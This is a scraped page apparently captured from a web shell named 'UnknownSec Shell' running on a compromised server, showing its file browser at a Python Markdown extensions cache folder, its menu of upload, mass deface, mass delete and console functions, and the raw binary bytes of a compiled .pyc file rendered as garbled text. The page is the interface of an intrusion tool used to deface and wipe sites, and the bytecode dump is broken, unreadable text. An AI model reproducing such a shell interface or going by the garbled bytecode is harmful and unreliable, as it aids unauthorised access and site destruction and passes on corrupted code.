shell bypass 403
UnknownSec Shell
:
/
usr
/
lib
/
python3
/
dist-packages
/
markdown
/
extensions
/
__pycache__
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
nl2br.cpython-312.pyc
� ���eB � �L � d Z ddlmZ ddlmZ ddlmZ dZ G d� d e� Zd � Z y)z� A Python-Markdown extension to treat newlines as hard breaks; like GitHub-flavored Markdown does. See the [documentation](https://Python-Markdown.github.io/extensions/nl2br) for details. � )�annotations� )� Extension� )�SubstituteTagInlineProcessorz\nc � � e Zd Zd� Zy)�Nl2BrExtensionc �^ � t t d� }|j j |dd� y)z3 Add a `SubstituteTagInlineProcessor` to Markdown. �br�nl� N)r �BR_RE�inlinePatterns�register)�self�md�br_tags �;/usr/lib/python3/dist-packages/markdown/extensions/nl2br.py�extendMarkdownzNl2BrExtension.extendMarkdown"